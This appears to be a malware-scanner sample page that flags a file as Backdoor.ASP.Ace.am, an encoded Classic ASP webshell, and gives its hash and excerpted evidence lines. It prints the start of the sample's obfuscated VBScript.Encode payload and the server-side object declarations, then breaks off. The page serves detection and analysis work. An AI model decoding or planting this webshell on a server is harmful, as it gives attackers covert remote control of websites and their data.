Suspicious 78% Download

Backdoor.ASP.Ace.am

Webshell in VBscript or JScript encoded using *.Encode plus a suspicious stringClassic ASP VBScript.Encode language directive
SHA-2562d7c2f4725e786419693c0d3473071953f4ba17d101cdb53e4dfe7fc0da64226
MaleculeO(C)Th

Evidence

Classic ASP VBScript.Encode language directive lines 1–4
1<%@ LANGUAGE = VBScript.Encode %>
2<object runat="server" id="SX" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
3<object runat="server" id="SX" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
4<%#@~^sloAAA==@#@&?nM\DRUmMrwDKr:W;O{ !ZT!Z@#@&"ndwKxk+ A;W6+.P{~KMEn@#@&rx~3MDGD,]/;s+,1+XY@#@&bawsk1lOrKx1mh+,'Pr�����Ƶ�����վ��������ǿ��E@#@&`/DKldd,P~P,~P,'~Ek6VWsNJ~PE��½����@#@&q^KnmYt,P,~P,P~P{PE4DYw=&zShhc!pMdR1Whzrhmon/Jok^+Pza+zE@#@&?4WSobVn&mKP …
Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string lines 4–13
4:23703… ,2U[,q0@#@&2 NPw;UmDkKx@#@&/GsXAA==^#~@%>
5<head>
6<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
7<title><%=#@~^HgAAAA==)awsbmmYkKxgC:[EP PE'U+D7nD&nAgoAAA==^#~@%></title>
8<style type="text/css">
9<!--
⋯4 lines

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.